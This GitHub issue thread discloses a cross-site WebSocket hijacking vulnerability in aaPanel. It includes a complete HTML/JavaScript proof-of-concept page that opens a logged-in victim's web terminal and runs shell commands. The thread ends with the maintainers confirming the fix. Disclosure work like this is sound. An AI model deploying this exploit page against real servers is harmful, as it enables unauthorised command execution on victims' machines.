Security Vulnerability in aaPanel #74

Closed
ssd-disclosure opened this issue Jun 23, 2021 · 10 comments
@ssd-disclosure

Hi,

I would like to report a security vulnerability in aaPanel.

I am not sure this is the right place, as it's public and visible to all. Would you like me to post the details here, or by email?

@kahisfz

kahisfz commented Jun 23, 2021

Hi,
Please post the details.
Thanks

@ssd-disclosure
Author

Affected version:

aaPanel LinuxStable 6.8.12

Affected Versions Assumed:

=6.8.4 to current, information obtained from commit https://sourcegraph.com/github.com/aaPanel/aaPanel/-/commit/5e2cbf9a5cb249d0fb58be09707b3fd73daf286a

Video Demo

https://www.youtube.com/watch?v=CHIs4qXgsuw

Requirements

  1. Knowledge of the IP/FQDN of the aaPanel
  2. Victim has to visit a malicious web site with Firefox (the vuln doesn't work with Chrome)
  3. Victim has to have configured Terminal with at least one host
  4. Victim has to have been logged on to the aaPanel prior to visiting the malicious web site

PoC

Please modify the host URL in line 6 if you want to reproduce the vulnerability locally.

```html
<!DOCTYPE html>
<meta charset="utf-8" />
<title>CSWH Hijacking exploit</title>
<script language="javascript" type="text/javascript">
//CHANGEME
var wsUri = "ws://192.168.15.33:8888/webssh"; //WS URL of the vulnerable app
var output;

//Auth check in https://github.com/aaPanel/aaPanel/blob/aacc0df179147bcd900dd753003e567ea1bc88ee/BTPanel/__init__.py#L233-L234

function init(){
  output = document.getElementById("output");
  testWebSocket();
}

function testWebSocket(){
  websocket = new WebSocket(wsUri);
  websocket.onopen = function(evt) { onOpen(evt) };
  websocket.onclose = function(evt) { onClose(evt) };
  websocket.onmessage = function(evt) { onMessage(evt) };
  websocket.onerror = function(evt) { onError(evt) };
}

function onOpen(evt){ //when the WS is connected, send a message to the server
  writeToScreen("CONNECTED");
  doSend('{}');
  doSend("cat /etc/issue;whoami;ls -la\n");
}

function onClose(evt){
  writeToScreen("DISCONNECTED");
}

function onMessage(evt){ //when receiving a WS message, send it in POST to my server
  writeToScreen("RECIEVED : " + evt.data);
}

function onError(evt){
  writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}

function doSend(message){ //function for sending messages via the WS
  writeToScreen("SENT : " + message);
  websocket.send(message);
}

function writeToScreen(message){ //function for showing errors and other info
  var pre = document.createElement("p");
  pre.style.wordWrap = "break-word";
  pre.innerHTML = message;
  output.appendChild(pre);
}

window.addEventListener("load", init, false);  //when loading the page, execute init()
// creating Websocket --> sending a message --> receiving the response and forward it to our server
</script>

<h2>WebSocket Exploit</h2>
<div id="output"></div>
```

@ssd-disclosure
Author

Hi,

Any plans on addressing this security issue?

@ssd-disclosure
Author

Hi,

Any plans on addressing this security vulnerability?

@ssd-disclosure
Author

Any plans on addressing this security vulnerability?

@aaPanel
Owner

aaPanel commented Aug 6, 2021

> Any plans on addressing this security vulnerability?

Thanks for the feedback. We will fix it in the next version.

@Liang2580

It is expected to be repaired next week

@ITKHMER

ITKHMER commented Dec 10, 2021

Has this issue been fixed? Because this issue is still open

@aaPanel
Owner

aaPanel commented Dec 11, 2021

This vulnerability has been fixed

@aaPanel aaPanel closed this as completed Dec 11, 2021
@ITKHMER

ITKHMER commented Dec 12, 2021

Thank you!
